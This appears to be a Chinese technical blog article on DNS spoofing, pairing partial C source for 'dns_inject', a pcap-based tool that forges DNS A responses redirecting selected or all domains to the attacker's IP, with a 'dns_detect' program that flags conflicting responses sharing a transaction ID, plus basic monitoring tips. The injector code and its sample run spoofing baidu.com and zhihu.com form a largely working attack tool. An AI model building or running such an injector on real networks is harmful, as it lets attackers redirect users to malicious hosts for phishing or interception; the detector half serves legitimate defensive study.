深入探讨DNS数据包注入与DNS中毒攻击检测 (C/C++代码实现)








1.查看系统日志信息,可以使用grep命令过滤出与DNS相关的日志,例如:grep “DNS” /var/log/messages。

2.查看网络负载情况,可以使用nload命令监控网络负载。首先需要安装nload工具,可以使用以下命令进行安装:sudo yum install nload。安装完成后,运行nload命令即可查看网络负载情况。


3.查看连接到您服务器的IP地址,可以使用netstat命令,例如:netstat -tuln | grep :53。




  1. DNS流量监控工具:使用专门的DNS流量监控工具,例如tcpdump、Wireshark、dnstop等。这些工具可以捕获网络中的DNS流量数据包,并提供详细的分析和统计信息。

  2. DNS服务器日志分析:许多DNS服务器会记录访问日志,其中包含有关每个DNS请求的详细信息。通过分析这些日志文件,可以获得有关DNS流量模式和请求的有用信息。一些常用的DNS服务器软件如BIND、PowerDNS等提供日志记录功能。

  3. DNS流量分析原理:DNS流量的分析通常涉及到解析数据包的相关信息,例如源IP地址、目标IP地址、域名、查询类型等。通过这些信息,可以推断网络中的通信模式和请求的特征。分析流量的目的是确定正常的流量模式,并识别异常或恶意的流量。

  4. 流量特征识别:通过监控和分析DNS流量,可以识别一些异常的流量特征,如大量的查询请求、异常的查询类型、短时间内的重复查询、不正常的响应时间等。这些特征可能暗示着DNS数据包注入或中毒攻击的发生。

  5. 数据包解析工具:使用数据包解析工具,如Wireshark,可以进一步分析捕获的DNS数据包。通过查看数据包的细节,例如查询字段、响应代码、权威服务器等信息,可以更加深入地了解每个请求的内容,并检测是否存在异常或可疑的特征。


深入探讨DNS数据包注入与DNS中毒攻击检测 (C/C++代码实现)

DNS数据包注入器以混杂模式捕获来自网络接口的流量,并试图注入对所选DNS a请求的伪造响应。DNS中毒攻击检测器检测DNS中毒攻击尝试。


#define PROMISC 1
#define READ_TIME_OUT 0
#define SIZE_ETHERNET 14
#define IP_SIZE 16
#define PACKET_SIZE 8192/* Ethernet header */
struct ethernet_header {u_char ether_dhost[ETHER_ADDR_LEN];u_char ether_shost[ETHER_ADDR_LEN];u_short ether_type;
};/* DNS header */
struct dns_header {char id[2];char flags[2];char qdcount[2];char ancount[2];char nscount[2];char arcount[2];
};/* DNS Question structure */
struct dns_question {char *qname;char qtype[2];char qclass[2];
};/* 文件选项的链接列表节点 */
struct node {char spoof_ip[32];char spoof_domain[150];struct node *next;
};void get_ip_of_attacker(char *if_name, char *ip) {struct ifreq ifr;size_t if_name_len = strlen(if_name);if (if_name_len < sizeof(ifr.ifr_name)) {memcpy(ifr.ifr_name, if_name, if_name_len);ifr.ifr_name[if_name_len] = 0;} else {fprintf(stderr, "interface name is too long");}int fd = socket(AF_INET, SOCK_DGRAM, 0);if (fd == -1) {fprintf(stderr, "%s", strerror(errno));}if (ioctl(fd, SIOCGIFADDR, &ifr) == -1) {int temp_errno = errno;close(fd);fprintf(stderr, "%s", strerror(temp_errno));}close(fd);struct sockaddr_in* ipaddr = (struct sockaddr_in*)&ifr.ifr_addr;memcpy(ip, inet_ntoa(ipaddr->sin_addr), 32);
}unsigned short find_checksum(unsigned short *buf, int len) {long sum = 0;  /* assume 32 bit long, 16 bit short */while (len > 1) {sum += *buf++;if (sum & 0x80000000)  /* if high order bit set, fold */sum = (sum & 0xFFFF) + (sum >> 16);len -= 2;}if (len)      /* take care of left over byte */sum += (unsigned short) * (unsigned char *)buf;while (sum >> 16)sum = (sum & 0xFFFF) + (sum >> 16);return ~sum;
}/** 使用原始套接字发送dns应答*/
void send_dns_reply(char* ip, u_int16_t port, char* packet, int packlen) {struct sockaddr_in to_addr;int bytes_sent, sock, one = 1;sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);if (sock < 0) {fprintf(stderr, "Could not create socket.\n");return;}
.../* The callback function for pcap_loop */
void dns_spoof(struct node *args, const struct pcap_pkthdr *header, const u_char *packet)
...memset(reply_packet, 0, PACKET_SIZE);/* define ethernet header */ether = (struct ethernet_header*)(packet);ip = (struct iphdr*)(((char*) ether) + sizeof(struct ethernet_header));/* get cleaned up IPs */src.s_addr = ip->saddr;dest.s_addr = ip->daddr;sprintf(src_ip, "%s", inet_ntoa(src));sprintf(dst_ip, "%s", inet_ntoa(dest));/* udp header */ip_header_size = ip->ihl * 4;udp = (struct udphdr*)(((char*) ip) + ip_header_size);/* dns header */dns_hdr = (struct dns_header*)(((char*) udp) + sizeof(struct udphdr));question.qname = ((char*) dns_hdr) + sizeof(struct dns_header);/** parse domain name*/
.../* get spoof IP */if (!strcmp(args->spoof_domain, "spoof_all")) {spoof_it = 1;memcpy(spoof_ip, args->spoof_ip, 32);} else {current = args;while (current != NULL) {if (!strcmp(current->spoof_domain, request)) {memcpy(spoof_ip, current->spoof_ip, 32);spoof_it = 1;}current = current->next;}}if (spoof_it == 1) {
...reply_packet_size = size;reply_ip_hdr = (struct ip *) reply_packet;reply_udp_hdr = (struct udphdr *) (reply_packet + sizeof (struct ip));reply_ip_hdr->ip_hl = 5;reply_ip_hdr->ip_v = 4;reply_ip_hdr->ip_tos = 0;reply_ip_hdr->ip_len = sizeof(struct ip) + sizeof(struct udphdr) + reply_packet_size;reply_ip_hdr->ip_id = 0;reply_ip_hdr->ip_off = 0;reply_ip_hdr->ip_ttl = 255;reply_ip_hdr->ip_p = 17;reply_ip_hdr->ip_sum = 0;reply_ip_hdr->ip_src.s_addr = inet_addr(dst_ip);reply_ip_hdr->ip_dst.s_addr = inet_addr(src_ip);reply_udp_hdr->source = htons(53);reply_udp_hdr->dest = udp->source;reply_udp_hdr->len = htons(sizeof(struct udphdr) + reply_packet_size);reply_udp_hdr->check = 0;reply_ip_hdr->ip_sum = find_checksum((unsigned short *) reply_packet, reply_ip_hdr->ip_len >> 1);/* 使用ip和udp报头更新数据包大小 */reply_packet_size += (sizeof(struct ip) + sizeof(struct udphdr));/* 发送我们的dns欺骗响应 */send_dns_reply(src_ip, ntohs((*(u_int16_t*)&udp)), reply_packet, reply_packet_size);printf("Spoofed %s requested from %s\n", request, src_ip);} else {printf("Not Spoofing %s requested from %s as it's not listed in file.\n", request, src_ip);}
}int main(int argc, char *argv[])
...memset(errbuf, 0, PCAP_ERRBUF_SIZE);/* Parse the command line arguments */while ((option = getopt(argc, argv, "i:f:h")) != -1) {switch (option) {case 'i':if (interface_provided) {printf("You should provide only one device. Multiple devices ""are not supported.\n");exit(EXIT_FAILURE);}dev = optarg;interface_provided = 1;break;case 'f':if (read_file) {printf("You should provide only one file. Multiple files ""are not supported.\n");exit(EXIT_FAILURE);}file_name = optarg;read_file = 1;break;case 'h':printf("help: dns_inject [-i interface] [-f hostnames] <expression>\n");exit(EXIT_SUCCESS);break;default:printf("unknown option or missing argument! Exiting.\n");exit(EXIT_FAILURE);}}.../* 如果用户未提供接口,则通过pcap库进行设置 */if (interface_provided != 1) {dev = pcap_lookupdev(errbuf);if (dev == NULL) {fprintf(stderr, "Couldn't find default device: %s\n", errbuf);exit(EXIT_FAILURE);}}/* 如果hostnames文件是由用户提供的,则解析该文件 */if (read_file == 1) {FILE *fptr = fopen(file_name, "r");if (fptr == 0) {fprintf(stderr, "failed to open input.txt\n");exit(EXIT_FAILURE);}head = current = NULL;while ((read = getline(&line, &len, fptr)) != -1) {if (read <= 9) {fprintf(stderr, "Malformed File.\n");goto free_list;}
...}fclose(fptr);} else { /* 未提供文件-使用攻击者IP欺骗所有文件 */struct node *new_node = malloc(sizeof(struct node));get_ip_of_attacker(dev, spoof_ip);memcpy(new_node->spoof_ip, spoof_ip, 16);new_node->spoof_ip[17] = '\0';memcpy(new_node->spoof_domain, "spoof_all", 9);new_node->spoof_domain[10] = '\0';head = new_node;}...if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {fprintf(stderr, "Can't get netmask for device %s\n", dev);net = 0;mask = 0;}handle = pcap_open_live(dev, BUFSIZ, PROMISC, READ_TIME_OUT, errbuf);if (handle == NULL) {fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);goto free_list;} else {printf("Listening on device: %s\n\n", dev);}/* 生成最终BPF过滤器字符串 */if (bpf_filter == 1) {filter_exp = malloc(strlen(dns_filter) + strlen(bpf_filter_exp) + 6);strcpy(filter_exp, dns_filter);strcat(filter_exp, " and ");strcat(filter_exp, bpf_filter_exp);} else {filter_exp = malloc(strlen(dns_filter) + 1);strcpy(filter_exp, dns_filter);}.../* apply the filter */if (pcap_setfilter(handle, &fp) == -1) {fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp,pcap_geterr(handle));goto free_filter;}/* set our callback function with infinite pcap_loop */pcap_loop(handle, -1, (pcap_handler)dns_spoof, (u_char *)head);/* clean up */pcap_freecode(&fp);pcap_close(handle);...


[root@localhost minger]# ./dns_inject
Listening on device: ens33

Spoofed www.baidu.com requested from
Spoofed www.zhihu.com requested from


[root@localhost minger]# ./dns_inject -i ens33 “ip src”
Listening on device: ens33

Spoofed www.baidu.com requested from
Spoofed www.zhihu.com requested from


  • dns_detect
#define PROMISC 1
#define READ_TIME_OUT 0
#define SIZE_ETHERNET 14
#define IP_SIZE 16
#define PACKET_SIZE 8192
#define MAX_ARRAY_SIZE 1000/* Ethernet header */
struct ethernet_header {u_char ether_dhost[ETHER_ADDR_LEN];u_char ether_shost[ETHER_ADDR_LEN];u_short ether_type;
};/* DNS header */
struct dns_header {char id[2];char flags[2];char qdcount[2];char ancount[2];char nscount[2];char arcount[2];
};/* DNS Question structure */
struct dns_question {char *qname;char qtype[2];char qclass[2];
};static int array_size = 0;struct node {u_short id;	int list_size;char ip[20][32];struct node *next;
};void dns_detect(struct node *database, const struct pcap_pkthdr *header, const u_char *packet)
.../* define ethernet header */ether = (struct ethernet_header*)(packet);ip = (struct iphdr*)(((char*)packet) + 14);/* udp header */ip_header_size = ip->ihl * 4;udp = (struct udphdr*)(((char*) ip) + ip_header_size);/* dns header */dns_hdr = (struct dns_header*)(((char*) udp) + sizeof(struct udphdr));/* start of question */question.qname = ((char *)dns_hdr + 12);/** parse domain name*/
.../* start of answer */answer_start = (char *)question.qname + j + 6;/* 正在保存DNS的当前ID */
......for (i = 0; i < htons(*((u_short *)(dns_hdr->ancount))); i++) {type = ((u_short *)(answer_start + 2))[0];class = ((u_short *)(answer_start + 4))[0];resp_size = ((u_short *)(answer_start + 10))[0];id_found = 0;if (htons(type) == 1) {	// Evaluate only if Type Aip_index = ((u_int *)(answer_start + 12))[0]; // 获取数据包中IP的索引sprintf(ip_from_pkt, "%u.%u.%u.%u", ((u_char *)(&ip_index))[0],((u_char *)(&ip_index))[1],((u_char *)(&ip_index))[2],((u_char *)(&ip_index))[3]);/* 检查ID是否已存在于数据库中,从而引发攻击 */for (j = 0; j < array_size; j++) {if (id == database[j].id) {index_in_db = j;possible_attack = 1;id_found = 1;}}strcpy(new_ip_list[k++], ip_from_pkt);answer_start = answer_start + 16;} else {answer_start = answer_start + 12 + htons(resp_size);}}/* 在数据库中找不到条目,请创建新条目 */if (id_found == 0) {for (i = 0; i < k; i++) {database[array_size].id = id;strcpy(database[array_size].ip[i], new_ip_list[i]);}database[array_size].list_size = k;array_size += 1;}/* 如果可能发生攻击,则警告用户 */if (possible_attack == 1) {/* 从数据包标头获取时间 */
...printf("\nDNS poisoning attempt detected!!!\n");printf("Timestamp: %s", asctime(timeinfo));printf("TXID: 0x");printf("%x", (int)(*(u_char *)(hex_id)));printf("%x\t", (int)(*(u_char *)(hex_id + 1)));printf("Request: %s\n", request);printf("Answer1 [");for (i = 0; i < database[index_in_db].list_size; i++) {if (i + 1 == database[index_in_db].list_size) {printf("%s", database[index_in_db].ip[i]);}else {printf("%s, ", database[index_in_db].ip[i]);}}printf("]\n");printf("Answer2 [");for (i = 0; i < k; i++) {if (i + 1 == k) {printf("%s", new_ip_list[i]);} else {printf("%s, ", new_ip_list[i]);}}printf("]\n");}
}int main(int argc, char *argv[])
.../* Parse the command line arguments */while ((option = getopt(argc, argv, "i:r:h")) != -1) {switch (option) {case 'i':if (interface_provided) {printf("You should provide only one device. Multiple devices ""are not supported.\n");exit(EXIT_FAILURE);}dev = optarg;interface_provided = 1;break;case 'r':if (read_file) {printf("You should provide only one file. Multiple files ""are not supported.\n");exit(EXIT_FAILURE);}file_name = optarg;read_file = 1;break;case 'h':printf("help: dns_detect [-i interface] [-r tracefile] <expression>\n");exit(EXIT_SUCCESS);break;default:printf("unknown option or missing argument! Exiting.\n");exit(EXIT_FAILURE);}}if (optind < argc) {bpf_filter_exp = argv[optind];bpf_filter = 1;}
...if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {fprintf(stderr, "Can't get netmask for device %s\n", dev);net = 0;mask = 0;}if (read_file == 1) {handle = pcap_open_offline(file_name, errbuf);  if (handle == NULL) {fprintf(stderr, "Couldn't open pcap file %s: %s\n", file_name, errbuf);exit(EXIT_FAILURE);} else {printf("Opened file %s\n\n", file_name);}} else {handle = pcap_open_live(dev, BUFSIZ, PROMISC, READ_TIME_OUT, errbuf);if (handle == NULL) {fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);exit(EXIT_FAILURE);} else {printf("Listening on device: %s\n\n", dev);}}if (bpf_filter == 1) {filter_exp = malloc(strlen(dns_filter) + strlen(bpf_filter_exp) + 6);strcpy(filter_exp, dns_filter);strcat(filter_exp, " and ");strcat(filter_exp, bpf_filter_exp);} else {filter_exp = malloc(strlen(dns_filter) + 1);strcpy(filter_exp, dns_filter);}if (pcap_compile(handle, &fp, filter_exp, 0, 0) == -1) {fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp,pcap_geterr(handle));goto free_filter;}if (pcap_setfilter(handle, &fp) == -1) {fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp,pcap_geterr(handle));goto free_filter;}...

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